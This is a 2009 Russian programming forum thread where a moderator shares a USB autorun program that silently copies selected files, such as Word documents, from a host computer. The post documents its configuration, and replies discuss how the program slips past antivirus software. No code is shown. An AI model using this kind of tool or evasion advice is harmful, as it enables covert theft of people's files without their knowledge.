Форум программистов «Весельчак У»
  *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

  • Рекомендуем проверить настройки временной зоны в вашем профиле (страница "Внешний вид форума", пункт "Часовой пояс:").
  • У нас больше нет рассылок. Если вам приходят письма от наших бывших рассылок mail.ru и subscribe.ru, то знайте, что это не мы рассылаем.
   Начало  
Наши сайты
Помощь Поиск Календарь Почта Войти Регистрация  
 
Страниц: [1]   Вниз
  Печать  
Автор Тема: Программа скрытого копирования файлов  (Прочитано 25590 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Serg79
Модератор

ru
Offline Offline
Пол: Мужской

WWW
« : 24-12-2009 19:43 » 

Цитата: Предыстория
Один мой знакомый попросил написать маленькую программку, которая бы размещалась на флешке и при открытии ее, копировала некоторые файлы на эту флешку. За один субботний вечер была написана эта программка.
На все мои вопросы, "зачем тебе это надо" и "помогла ли тебе, в твоих шпионских делах, программа" он упорно молчит. Улыбаюсь

Программа предназначена для скрытого копирования файлов и поддержания их в синхронизированном состоянии с оригиналом. Запуск программы обеспечивается "autorun.inf" файлом размешенном в корневой директории сменного накопителя или подключаемого жесткого диска. Таким образом, если в системе отключена функция "AutoRun" ([HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoDriveTypeAutoRun"=dword:000000ff), запуск программы не будет выполняться.

Код: (Text) "Возможности"
# Файл конфигурации должен находиться в одной директории с программой и
# иметь название 'duplicate.lst'. Хорошей идеей использовать в качестве
# файла конфигурации этот файл, продолжив его списком копируемых файлов и
# сканируемых директорий. Все строки в файле 'duplicate.lst' начинающиеся
# с символа '#' являются комментариями и игнорируются при разборе файла
# конфигурации.
#
# Список параметров передаваемых через командную строку:
# --enable-log         - записывать информацию о ходе своей работы.
#                        Log-файл создается в одной директории с
#                        программой под именем 'duplicate.log'.
# --disable-explorer   - не запускать 'explorer'. В основном используется
#                        для отладки приложения через отладчик.
#
# Список поддерживаемых модификаторов:
# c= - копировать
# C= - копировать рекурсивно
# l= - отправить в log список файлов
# L= - отправить в log рекурсивный список файлов
# d= - отправить в log список дисков установленных в системе
# если модификатора нет то подразумевается 'c='.
#
# Так же в конце имени файла можно использовать два символа подстановки:
# * - соответствует любой строке символов а так же пустой строке
# ? - соответствует любому одиночному символу
#
# Примеры:
# d:\dir\*.doc         - копировать все документы Word
# d:\dir2\file?.tx?    - копировать файлы по шаблону (например 'file2.txt', 'file_.tx9')
# d:\dir\file.txt      - копировать файл 'file.txt'
# c=d:\dir\file.txt    - копировать файл 'file.txt'
# C=c:\dir             - копировать рекурсивно каталог 'dir'
# C=c:\dir\            - копировать рекурсивно каталог 'dir'
# l=c:\катал1          - отправить в log содержимое каталога 'катал1'
# l=c:\катал1\         - отправить в log содержимое каталога 'катал1'
# L=c:\катал1          - отправить в log содержимое каталога 'катал1' и его подкаталогов
# d=                   - отправить в log список дисков установленных в системе
#

Программа может быть полезна в качестве примера рекурсивного обхода каталога и его подкаталогов, а так же в способе определения достоверности копии файла на основе временных меток.

* duplicate.zip (11.01 Кб - загружено 1432 раз.)
Записан
zubr
Гость
« Ответ #1 : 25-12-2009 07:01 » 

Программа выполняет синхронизацию файлов только при запуске? Или крутится пока работает система? Если последнее, то по какому принципу происходит обновление.
Записан
Serg79
Модератор

ru
Offline Offline
Пол: Мужской

WWW
« Ответ #2 : 25-12-2009 07:57 » 

zubr, только при запуске, а запускается всякий раз когда открывается диск через проводник.
Записан
RXL
Технический
Администратор

ru
Offline Offline
Пол: Мужской

WWW
« Ответ #3 : 25-12-2009 08:39 » 

Serg79, а как программа дружит с антивирусами?
Записан

... мы преодолеваем эту трудность без синтеза распределенных прототипов. (с) Жуков М.С.
Serg79
Модератор

ru
Offline Offline
Пол: Мужской

WWW
« Ответ #4 : 25-12-2009 09:20 » 

RXL, антивирусы на нее не реагируют, они же не знают что есть такая программа. Улыбаюсь
Записан
Sla
Команда клуба

ua
Offline Offline
Пол: Мужской

WWW
« Ответ #5 : 25-12-2009 09:26 » 

Вредоносный код не выполняется?
Антивирус должен молчать.

Заказчик так захотел. Кстати, очень удобно забирать логи с технологических машин, где доступ к клаве затруднен.
Записан

Мы все учились понемногу... Чему-нибудь и как-нибудь.
zubr
Гость
« Ответ #6 : 25-12-2009 09:29 » 

RXL, а какие проблемы могут быть с антивирусами, если прога не в базе антивируса. Правда эвристический анализ может среагировать на определенную комбинацию функций, но и это не факт. Лет 5 назад я писал прогу которая шпионила за дисководом, причем сидела постоянно в системе и активировалась, когда пользователь производил какие то операции с диском A. Касперский и Web молчали (другие антивирусы не проверял). Вот файрволл может возникать, если происходит внедрение в адресное пространство другого процесса.
Записан
Finch
Спокойный
Администратор

il
Offline Offline
Пол: Мужской
Пролетал мимо


« Ответ #7 : 25-12-2009 12:33 » 

zubr, А зачем адрессное пространство чужого процесса влазить в данной программе? Кстати, это не функция файрвола. Следить кто и куда влез внутри системы. Его функции чтоб зашить систему от внешнего мира. Если честно говоря. Похоже на швейцарский нож. Много функций. И все они не проффессионально выполняются.
Записан

Не будите спашяго дракона.
             Джаффар (Коша)
zubr
Гость
« Ответ #8 : 25-12-2009 14:14 » new

zubr, А зачем адрессное пространство чужого процесса влазить в данной программе? Кстати, это не функция файрвола. Следить кто и куда влез внутри системы. Его функции чтоб зашить систему от внешнего мира. Если честно говоря. Похоже на швейцарский нож. Много функций. И все они не проффессионально выполняются.
Я говорил не о применении внедрения в адресное пространство для данной программы, а о функциях файрвола. К примеру, Outpost будет реагировать на программу, которая поставила глобальный хук.
Записан
Страниц: [1]   Вверх
  Печать  
 

Powered by SMF 1.1.21 | SMF © 2015, Simple Machines